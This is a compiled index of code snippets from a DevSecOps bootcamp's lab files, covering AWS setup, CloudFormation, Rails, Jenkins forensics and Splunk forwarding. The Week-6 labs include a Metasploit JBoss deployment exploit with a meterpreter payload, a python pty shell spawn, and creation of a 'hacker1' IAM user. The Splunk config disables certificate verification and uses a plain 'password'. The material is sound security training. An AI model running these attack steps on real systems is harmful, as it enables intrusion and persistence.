instance from the bastion using SSH. Assumes default user `ec2-user`. ```bash ssh ec2-user@10.0.0.x ``` -------------------------------- ### Connect to EC2 Instance Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-3.md Connect to your AWS EC2 instance using SSH with a specified private key. ```bash ssh -i ~/Downloads/jg.pem ec2-user@54.x.x.x ``` -------------------------------- ### CloudFormation Launch Configuration Resource Source: https://github.com/devsecops/bootcamp/blob/master/Week-5/labs/LAB-2.md Defines a Launch Configuration for an Auto Scaling Group. This specifies the instance details, including security groups, AMI, instance type, and key pair. ```json "WebServerInstance": { "Type": "AWS::AutoScaling::LaunchConfiguration", "Properties": { "SecurityGroups": [ { "Ref": "AppSecurityGroup" } ], "ImageId": { "Ref": "AmiId" }, "InstanceType": { "Ref": "InstanceType" }, "KeyName": { "Ref": "KeyName" }, "UserData": { ... } } } ``` -------------------------------- ### Basic CloudFormation Template Structure Source: https://github.com/devsecops/bootcamp/blob/master/Week-5/labs/LAB-1.md This snippet shows the minimum required sections for a CloudFormation template: AWSTemplateFormatVersion, Description, Parameters, Resources, and Outputs. ```json { "AWSTemplateFormatVersion": "2010-09-09", "Description": "...", "Parameters": { }, "Resources": { }, "Outputs": { } } ``` -------------------------------- ### Lab #2 Outline Source: https://github.com/devsecops/bootcamp/blob/master/Week-8/LESSON-2.md This snippet outlines the key components or steps for Lab #2. It is presented as a list. ```text * * * * * ``` -------------------------------- ### List Jenkins User Home Directory Contents Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/labs/LAB-3.md Lists all files and directories within the Jenkins user's home directory. ```bash ls -a /mnt//jenkins/var/lib/jenkins ``` -------------------------------- ### AWS CLI Configuration Prompt Source: https://github.com/devsecops/bootcamp/blob/master/Week-1/labs/LAB-3.md This is the expected interactive prompt when configuring the AWS CLI. Fill in your AWS credentials and desired region/format. ```text AWS Access Key ID [None]: AWS Secret Access Key [None]: Default region name [None]: Default output format [None]: ``` -------------------------------- ### Create and Count Words in a Text File Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md Creates a new text file using 'cat' and then counts the words within it. Press Ctrl+D to finish input. ```bash $ cat > file.txt this is my file, there are many like it but this one is mine... ^D ``` -------------------------------- ### Set Root Route Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-2.md Sets the root route of the application to the index action of the bootcamps controller. ```ruby root 'bootcamps#index' ``` -------------------------------- ### Display Network Information Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md Shows network interface configuration (ifconfig), routing table (route), and network connections (netstat). ```bash $ ifconfig $ route $ netstat -na ``` -------------------------------- ### Clone Selfie Repository Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/labs/LAB-2.md Clone the Selfie tool's Git repository to your local machine to begin the automation process. ```bash $ git clone https://github.com/devsecops/selfie.git ``` -------------------------------- ### Gather IAM Configuration Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/LESSON-1.md Collect IAM configuration details using AWS CLI. This helps in understanding user permissions and policies. ```bash aws iam list-users --region us-east-1 > iam-users.json aws iam list-roles --region us-east-1 > iam-roles.json aws iam list-policies --region us-east-1 > iam-policies.json ``` -------------------------------- ### View Jenkins Auth Log Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/labs/LAB-3.md Displays the Jenkins authentication log to review system user activity. ```bash sudo cat /mnt//jenkins/var/log/auth.log ``` -------------------------------- ### Add Search Form to Index View Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-2.md Adds a search form to the `index` view for bootcamps, allowing users to input search terms. ```erb

Search

<%= form_tag(bootcamps_path, method: "get", id: "search-form") do %> <%= text_field_tag :search, params[:search], placeholder: "Search Bootcamps" %> <%= submit_tag "Search Bootcamps"%> <% end %>

Listing Bootcamps

``` -------------------------------- ### Upload Configuration Files to S3 Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/labs/LAB-1.md Iterate through all JSON files in the current directory and upload them to the specified S3 bucket using the AWS CLI. This command is used to store collected forensic data. ```bash for FILE in `ls *.json`; do aws s3 cp $FILE s3://dso-bootcamp-forensics/student1/ done ``` -------------------------------- ### Spawn Bash Shell Source: https://github.com/devsecops/bootcamp/blob/master/Week-6/labs/LAB-3.md Use this Python command to spawn an interactive bash shell after gaining initial access. ```bash > shell python -c 'import pty; pty.spawn("/bin/bash")' [ec2-user@ip-10-0-2-43 jboss-5.1.0.GA]$ cd ~ ``` -------------------------------- ### List Stacks with Restacker Source: https://github.com/devsecops/bootcamp/blob/master/Week-5/labs/LAB-3.md Command to list all current stacks managed by Restacker for a specific application and user context. ```bash $ restacker list -l myapp -u student1 -c dso ``` -------------------------------- ### Exploit JBoss DeploymentFileRepository WAR Deployment Source: https://github.com/devsecops/bootcamp/blob/master/Week-6/labs/LAB-2.md Configure and run the JBoss DeploymentFileRepository WAR Deployment exploit. Set the target host, exploit target, payload, and listener port (LPORT) based on your student ID. ```bash > use exploit/multi/http/jboss_invoke_deploy > set RHOST 10.0.6.165 > set target 1 > set payload java/meterpreter/bind_tcp > set LPORT 10001 > exploit ``` -------------------------------- ### Configure AWS CLI Profile Source: https://github.com/devsecops/bootcamp/blob/master/Week-3/labs/LAB-1.md Configure AWS CLI with access keys and a default region for a specific profile. This is typically done after downloading credentials. ```bash aws configure --profile dso AWS Access Key ID [None]: AWS Secret Access Key [None]: Default region name [None]: us-west-2 Default output format [None]: json ``` -------------------------------- ### Create AWS IAM User Source: https://github.com/devsecops/bootcamp/blob/master/Week-6/labs/LAB-3.md Create a new IAM user and group in AWS, matching your student ID. ```bash $ aws iam create-user --user-name hacker1 $ aws iam create-group --group-name hacker1 $ aws iam add-user-to-group --group-name hacker1 --user-name hacker1 ``` -------------------------------- ### Configure Splunk Outputs Source: https://github.com/devsecops/bootcamp/blob/master/Week-5/labs/LAB-3.md Configures the Splunk Universal Forwarder to send logs to a specified server group. ```bash "echo \"[tcpout]\n", "defaultGroup = dso-autolb-group\n", "\n", "[tcpout:dso-autolb-group]\n", "disabled = false\n", "dropEventsOnQueueFull = 10\n", "server = appliance:9997\n", "sslCertPath = \\\$SPLUNK_HOME/etc/auth/server.pem\n", "sslPassword = password\n", "sslRootCAPath = \\\$SPLUNK_HOME/etc/auth/cacert.pem\n", "sslVerifyServerCert = false\n", "useACK = false\" >> /opt/splunkforwarder/etc/system/local/outputs.conf\n" ```